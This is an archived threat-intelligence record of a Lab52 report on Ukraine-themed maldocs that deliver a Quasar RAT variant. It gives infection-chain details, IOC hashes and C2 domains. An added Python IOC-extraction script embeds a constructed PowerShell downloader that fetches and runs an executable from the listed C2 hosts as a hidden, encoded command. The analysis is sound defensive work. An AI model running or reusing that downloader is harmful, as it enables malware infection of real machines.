{
	"id": "04daae9c-29c7-4b5a-b0c0-89b9a32a5cbe",
	"created_at": "2026-04-06T00:13:55.830248Z",
	"updated_at": "2026-04-10T03:20:51.496406Z",
	"deleted_at": null,
	"sha1_hash": "9de160ea8e73fcdf71947bbb8882ab0191728f03",
	"title": "Another cyber espionage campaign in the Russia-Ukrainian ongoing cyber attacks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5795305,
	"plain_text": "Another cyber espionage campaign in the Russia-Ukrainian ongoing cyber attacks\r\nPublished: 2022-03-24 · Archived: 2026-04-05 17:37:50 UTC\r\nFrom Lab52, in connection with the latest events in Russia’s ongoing cyberattacks against Ukraine: beyond the destructive artifacts seen so far (wipers and others), a new wave of malicious Office documents (hereinafter maldocs) has been observed attempting to compromise systems with a variant of the well-known open-source malware Quasar RAT.\r\nRecently we identified a maldoc named “Ukraine Conflict Update 16_0.doc” with a creation time of 2022-03-16, whose content appears to have been copied directly from the Institute for the Study of War website. Given that creation time, the maldoc carries the site’s update as it stood on that date; at the time of writing (2022-03-24) the most recent update published on the site is from March 23.\r\nThe latest content of the Institute for the Study of War website at the time of writing is reproduced as a screenshot in the original post.\r\nhttps://lab52.io/blog/another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks/\r\nPage 1 of 12\r\n\r\nBack to the maldoc analysis: the document contains a VBA function that triggers the execution of a base64-encoded Windows PowerShell command.\r\nAfter applying deobfuscation techniques we rebuilt the PowerShell command. It issues an HTTP GET request against a list of command-and-control (C2) servers to obtain a Windows PE file, saves the file in the %TEMP% directory under the name sarewfdsdfh.exe and runs it as a new process started from powershell.exe.\r\nNote the highlighted domains; we will come back to them later.\r\nPivoting on the C2 domains in this sample, we 
found an interesting list of other samples on the same subject that appear to be part of an ongoing campaign. One of them is a ZIP archive (“Ukraine Conflict Update 16_0.zip”) containing an .xlsm and a .docm Office document with the same name. We assume the initial attack vector is a spear-phishing email.\r\nBoth files carry obfuscated VBA macros that build a script to deploy the infection chain; unlike the first sample, they contain no encoded PowerShell command.\r\nRebuilding the scripts by deobfuscating the VBA macros made it possible to trace the actions taken to infect the victim machine. Both documents perform the same steps: they send an HTTP GET request to the C2 asking for a PE file named b29.exe and, if the response code is 200, store the file in the %TEMP% directory and execute it directly from the WINWORD.EXE process.\r\nRegarding network communication, the C2 is hosted on b29[.]bet, which resolves to 104.18.24[.]213, an IP address belonging to Cloudflare; the address therefore identifies the proxy in front of the C2 rather than the origin host and is of little use as an indicator on its own. The domain registrant information is reproduced in the original post.\r\nTurning to recent related artifacts downloaded from the C2, we identified, through the URI hxxp://b29[.]bet/SoftwareUpdate.exe, another related maldoc with an interesting topic.\r\nFrom that URI we found a new malicious document contacting the same C2. 
This maldoc is named “Leaked_Kremlin_emails_show_Minsk_protoco.doc”; its content (shown in the original post) is a copy of an article published by Euromaidan Press, a Ukrainian online newspaper, and the original report is linked from the post. The analysis revealed similarities in the infection chain: it is built from malicious VBA macros, uses the same C2 domain and, as described below, also uses an encoded PowerShell command.\r\nThe maldoc uses a base64-encoded Windows PowerShell command (as in the first maldoc analyzed) to download the payload from the C2 and then executes it through a WScript object.\r\nThe PowerShell command communicates over plain HTTP, sending a GET request without User-Agent or Accept headers, as seen in the previous maldocs; a bare GET carrying neither header is unusual for legitimate Windows clients and is itself a usable network signature. The C2 domain it contacts is contained in the domain list extracted from the first maldoc.\r\nWe also saw it on the online malware sandbox ANY.RUN with the same network behavior.\r\nThis maldoc also walks the same domain list found in the first maldoc, requesting a Windows PE file named SoftwareUpdate.exe.\r\nSo far, the Windows PE file most requested by the analyzed maldocs is SoftwareUpdate.exe, and depending on when it is requested the C2 may or may not serve it.\r\n
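As an added example (not code from the Lab52 post), the following Python script does the extraction step described for the three maldocs above: it pulls any -EncodedCommand blob out of a recovered PowerShell command line, decodes it as UTF-16LE, and lists the C2 hosts and the .exe names the downloader writes or fetches, so the same routine serves the encoded .doc samples and the clear-text script of the .docm/.xlsm pair. The downloader embedded in it is constructed to match the behaviour described (GET against a list of C2s, save under %TEMP% as sarewfdsdfh.exe, run it) and is not the real payload; the host names are taken from the post’s IOC list.

```python
import base64
import binascii
import re

# Added example (not Lab52's code): recover the C2 hosts and dropped file names
# from the command line a maldoc hands to PowerShell, whether the script travels
# as a base64 -EncodedCommand blob (the .doc samples) or appears in clear text
# after deobfuscating the macro (the .docm/.xlsm pair). The sample payload below
# is constructed for this example; the host names are taken from the post's IOCs.

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENC_RE = re.compile('-(?:e|ec|en|enc|encodedcommand)[ ]+([A-Za-z0-9+/=]{16,})', re.IGNORECASE)
# A URL (hxxp/http/https); the path part is kept deliberately loose.
URL_RE = re.compile('(?:hxxps?|https?)://([A-Za-z0-9.-]+)(?::[0-9]+)?(?:/[A-Za-z0-9._/-]*)?', re.IGNORECASE)
EXE_RE = re.compile('([A-Za-z0-9_-]+[.]exe)', re.IGNORECASE)


def decode_encoded_command(cmdline):
    '''The UTF-16LE script behind each -enc blob on the line (empty list if none or invalid).'''
    scripts = []
    for blob in ENC_RE.findall(cmdline):
        try:
            raw = base64.b64decode(blob, validate=True)
        except (ValueError, binascii.Error):
            continue
        scripts.append(raw.decode('utf-16-le', errors='replace'))
    return scripts


def defang(host):
    return host.replace('.', '[.]')


def extract_iocs(text):
    '''Decode any -enc blobs, then collect defanged hosts and .exe names from
    the original line plus the decoded scripts.'''
    decoded = decode_encoded_command(text)
    corpus = ' '.join([text] + decoded).replace('[.]', '.')  # refang so defanged input matches too
    hosts = sorted({defang(h.lower()) for h in URL_RE.findall(corpus)})
    exes = sorted({e for e in EXE_RE.findall(corpus) if e.lower() != 'powershell.exe'})
    return {'hosts': hosts, 'files': exes, 'decoded_scripts': decoded}


# Constructed stand-in for the deobfuscated downloader: try each C2 in turn,
# save the PE as sarewfdsdfh.exe under %TEMP%, start it. Not the real payload.
SAMPLE_SCRIPT = ('''$h=@('http://b29.bet','http://go88.gold','http://taisunwin.club');'''
                 '''$p=Join-Path $env:TEMP 'sarewfdsdfh.exe';'''
                 '''foreach($u in $h){try{(New-Object Net.WebClient).DownloadFile($u+'/SoftwareUpdate.exe',$p);'''
                 '''Start-Process $p;break}catch{}}''')


def sample_command_line():
    '''The command line a macro would launch: the script UTF-16LE-encoded, then base64, after -Enc.'''
    blob = base64.b64encode(SAMPLE_SCRIPT.encode('utf-16-le')).decode('ascii')
    return 'powershell.exe -NoP -W Hidden -Enc ' + blob


if __name__ == '__main__':
    print(extract_iocs(sample_command_line()))
```

Run it with python3 and it prints the IOC dictionary for the constructed command line; feed it the command line from a sandbox process log or from olevba output to get the same for a real sample. Invalid base64 is skipped rather than raising, because a truncated or tampered blob is a routine condition in process logs.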
After obtaining this PE file from the C2, simple static analysis was enough to conclude that it is a variant of the well-known open-source malware Quasar RAT, developed on the .NET Framework.\r\nQuasar RAT is distributed under the MIT (Massachusetts Institute of Technology) license and is freely available on GitHub.\r\nDebugging the sample to observe its behavior, we saw that it checks the path it is running from and copies itself into a new directory named “PDF Reader” under %PROGRAMFILES%. It then hides itself on disk by setting the Hidden flag of the FileAttributes enumeration on its own executable (Application.ExecutablePath is given FileAttributes.Hidden).\r\nWith the environment prepared, Quasar contacts the C2 to report a newly compromised computer. At this point of the analysis we found the same domain list previously identified through the maldocs: it is stored in a dynamic object named hostsManager, in the attribute queue_0, and each entry holds the domain or IP address and the port used to contact the C2.\r\n
Quasar RAT contacts every entry in that list on the same TCP port, 4782 (Quasar’s default), and every session is TLS-encrypted except the one with the domain b29[.]bet.\r\nFinally, we found its TLS certificate: the subject is “Quasar Server CA”, the expiration date is 31/12/9999 and it appears to have been generated on March 04, 2022. Both the subject and the expiration date are what the Quasar server produces by default, so they identify the malware family rather than this particular operator.\r\nIn short, beyond the destructive artifacts seen in Russia’s ongoing cyberattacks against Ukraine, there is also room for cyberespionage campaigns that take advantage of the information being published about the conflict. However, we do not yet have enough evidence to make any attribution.\r\nINDICATORS OF COMPROMISE:\r\nMALDOCS (filename, SHA1):\r\nUkraine Conflict Update 16_0.doc  6e7775277b18a481ca4ce24d5e13fd38ab1b5991\r\nUkraine Conflict Update 16_0.docm  079037f3abff65ce012af1c611f8135726ef0ad2\r\nUkraine Conflict Update 16_0.xlsm  35c6d3b40ba88f5da444083632c8e414a67db267\r\nUkraine Conflict Update 16_0.zip  296f26fb9b09a50f13bdf6389c05f88019bac13f\r\nLeaked_Kremlin_emails_show_Minsk_protoco.doc  4476657d32a55ca0d89d21d2a828a8d8cbc5dbab\r\nQUASAR RAT (filename, SHA1):\r\nThe increasingly complicated Russia-Ukraine crisis explained.zip  34dfdf16d13f974a06f46486ab4ad7034db8e9d5\r\nThe increasingly complicated Russia-Ukraine crisis explained.exe.pdf  bbb9bf63efc448706f974050bef23bb1edd13782\r\nSoftwareUpdate.exe  bbb9bf63efc448706f974050bef23bb1edd13782\r\n(The last two entries share a SHA1: they are the same binary delivered under two names.)\r\nNETWORK (domain list):\r\ntaisunwin[.]club\r\nweb.sunwinvn[.]vip\r\nsunvn[.]vin\r\nb29[.]bet\r\nplay.go88vn[.]vin\r\nplaygo88[.]fun\r\nchoigo88[.]us\r\ngo88c[.]net\r\ngo88[.]gold\r\ngo88vn[.]vin\r\ngo88code[.]com\r\nthesieutoc[.]net\r\nsun[.]fun\r\nCustomers of Lab52’s private APT intelligence feed service already have additional tools and means of detection for this campaign.\r\nIf you have a threat hunting service or are a client of S2Grupo CERT, this intelligence has already been applied.\r\nIf you need more information about Lab52’s private APT intelligence feed service, you can contact us through the contact link in the original post.\r\nSource: https://lab52.io/blog/another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://lab52.io/blog/another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks/"
	],
	"report_names": [
		"another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks"
	],
	"threat_actors": [],
	"ts_created_at": 1775434435,
	"ts_updated_at": 1775791251,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9de160ea8e73fcdf71947bbb8882ab0191728f03.pdf",
		"text": "https://archive.orkl.eu/9de160ea8e73fcdf71947bbb8882ab0191728f03.txt",
		"img": "https://archive.orkl.eu/9de160ea8e73fcdf71947bbb8882ab0191728f03.jpg"
	}
}